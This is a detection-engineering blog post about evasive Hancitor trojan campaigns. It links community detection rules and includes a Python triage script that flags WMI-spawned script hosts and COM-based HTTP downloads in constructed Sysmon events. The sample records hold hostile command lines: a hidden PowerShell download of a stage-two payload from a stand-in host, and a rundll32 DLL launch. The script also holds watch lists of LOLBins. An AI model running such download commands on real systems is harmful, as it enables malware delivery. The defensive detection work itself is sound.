Today’s post is about fresh versions of the Hancitor trojan and a couple of rules released by Threat Bounty Program participants that enable security solutions to detect them.
Hancitor Trojan (Evasion Technique) community rule by Emir Erdogan: https://tdm.socprime.com/tdm/info/GwJ4Y7k7tzaz/1rBKXHMBSh4W_EKGF2on/?p=1
Hancitor infection with Ursnif exclusive rule by Osman Demir: https://tdm.socprime.com/tdm/info/DXrFgt0kTBg1/Z9TBUXMBPeJ4_8xc-IFm/
Hancitor first appeared in 2013, and at the end of last year its authors significantly modified it, turning a dated Trojan into an evasive threat. It is distributed primarily through spam email campaigns, targets Windows systems, and serves attackers as a downloader for the next-stage payload. The new version has been used most of all in attacks on users and organizations in the United States, with further targets in Canada, South and Central America, Europe, and the APAC region. One of the most notable changes is the capability to download and execute a DLL module; the network communication protocol has also been substantially reworked.
In recent campaigns, the operators combined several Living off the Land techniques to evade detection: WMI for indirect command execution, and COM objects to download the stage-two binary in both proxy and non-proxy environments.
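The two behaviours above leave a recognisable trace in process-creation telemetry: a command spawned through WMI (Win32_Process.Create) shows WmiPrvSE.exe as its parent rather than the process that requested it, and a script that downloads through COM carries the ProgID of an HTTP-capable object on its command line. The following is an added example, written for this post and not the logic of the Threat Bounty rules linked above, that runs both checks over a handful of constructed Sysmon Event ID 1 records. The watch lists of child processes and COM ProgIDs, the sample records and the hostname payload.invalid are all assumptions made for illustration.

```python
import re
from typing import Dict, List, Tuple

# Parent image that marks WMI-initiated execution: a process created via
# Win32_Process.Create is spawned by the WMI provider host, not by the caller.
WMI_PROVIDER_HOSTS = {"wmiprvse.exe"}

# Script hosts and LOLBins whose appearance under WmiPrvSE.exe deserves a look.
# Assumed set for illustration; extend it from your own baseline.
SUSPICIOUS_WMI_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe",
}

# COM ProgIDs that give a script an HTTP client without a native downloader.
# Assumed list. MSXML2.XMLHTTP goes through WinINet and inherits the user's
# proxy settings; MSXML2.ServerXMLHTTP and WinHttp.WinHttpRequest expose
# SetProxy, which is why both kinds show up in proxy and non-proxy networks.
HTTP_COM_PROGID = re.compile(
    r"msxml2\.(?:server)?xmlhttp|microsoft\.xmlhttp|winhttp\.winhttprequest"
    r"|internetexplorer\.application",
    re.IGNORECASE,
)
# PowerShell, VBScript/JScript and .NET ways of instantiating a COM object.
COM_INSTANTIATION = re.compile(
    r"new-object\s+-com(?:object)?\b|createobject\s*\(|\[activator\]::createinstance",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def wmi_indirect_execution(ev: Dict[str, str]) -> bool:
    """True when a script host or LOLBin is spawned by the WMI provider host."""
    return (_basename(ev.get("ParentImage", "")) in WMI_PROVIDER_HOSTS
            and _basename(ev.get("Image", "")) in SUSPICIOUS_WMI_CHILDREN)


def com_http_download(ev: Dict[str, str]) -> bool:
    """True when the command line instantiates an HTTP-capable COM object."""
    cl = ev.get("CommandLine", "")
    return bool(COM_INSTANTIATION.search(cl) and HTTP_COM_PROGID.search(cl))


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (event index, names of matched checks) for every matching event."""
    checks = [("wmi_indirect_execution", wmi_indirect_execution),
              ("com_http_download", com_http_download)]
    hits = []
    for i, ev in enumerate(events):
        reasons = [name for name, fn in checks if fn(ev)]
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # 0: ordinary interactive launch, should not match
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "notepad.exe",
    },
    {   # 1: cmd.exe created through Win32_Process.Create, so WmiPrvSE is the parent
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": r"cmd.exe /c rundll32 C:\Users\Public\stage2.dll,Start",
    },
    {   # 2: WMI-spawned PowerShell fetching a file through an MSXML COM client
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": ("powershell -w hidden $x=New-Object -ComObject MSXML2.XMLHTTP;"
                        "$x.open('GET','http://payload.invalid/s2.bin',$false);$x.send()"),
    },
    {   # 3: management agent legitimately started by WMI; not in the watch list
        "Image": r"C:\Program Files\ExampleAgent\inventory.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "inventory.exe --collect",
    },
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Event 3 shows the precision trade-off: plenty of management agents are legitimately started by WMI, so the parent check alone is too noisy and is narrowed to script hosts and LOLBins; the COM check is the stronger signal, and an event that trips both (event 2) is the one to escalate first.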
The rules have translations for the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, LogPoint, Humio
EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint
Tactics: Execution, Discovery
Techniques: PowerShell (T1086; since ATT&CK v7 this is T1059.001, Command and Scripting Interpreter: PowerShell), Windows Management Instrumentation (T1047), Query Registry (T1012)